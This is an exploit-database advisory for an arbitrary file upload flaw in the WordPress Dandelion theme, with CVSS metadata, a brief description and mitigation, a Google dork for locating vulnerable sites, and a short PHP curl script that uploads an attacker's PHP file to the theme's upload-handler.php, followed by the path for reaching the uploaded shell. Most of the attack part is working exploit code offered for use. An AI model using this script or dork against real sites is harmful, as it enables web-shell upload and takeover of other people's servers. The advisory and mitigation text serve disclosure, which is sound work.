Wordpress Dandelion Themes Arbitry File Upload

vendor:

Dandelion Powerful Elegant Wordpress Theme

by:

TheBlackMonster (Marouane)

7,5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Dandelion Powerful Elegant Wordpress Theme

Affected Version From: Web Application

Affected Version To: Web Application

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Mozilla, Chrome, Opera -> Windows & Linux

2014

WordPress Dandelion Themes Arbitry File Upload

An arbitrary file upload vulnerability exists in the Dandelion Themes for Wordpress. An attacker can exploit this vulnerability to upload malicious files to the web server and execute arbitrary code. The vulnerability is due to insufficient validation of the uploaded file type. An attacker can exploit this vulnerability by uploading a malicious file with a double extension such as .php.jpg. This can be done by using the upload-handler.php script in the functions directory.

Mitigation:

Ensure that the application validates the file type of the uploaded file and only allows files with the expected extension.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
# Google Dork: inurl:/wp-content/themes/dandelion/
# Date: 31/01/2014
# Exploit Author: TheBlackMonster (Marouane)
# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628
# Software Link: Not Available
# Version: Web Application
# Tested on: Mozilla, Chrome, Opera -> Windows & Linux
‪#‎Greetz‬ : PhantomGhost, Deto Beiber, All Moroccan Hackers.

We are Moroccans, we are genuis !

<?php
$uploadfile="yourfile.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/dandelion/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

File Access :

http://127.0.0.1/uploads/[years]/[month]/your_shell.php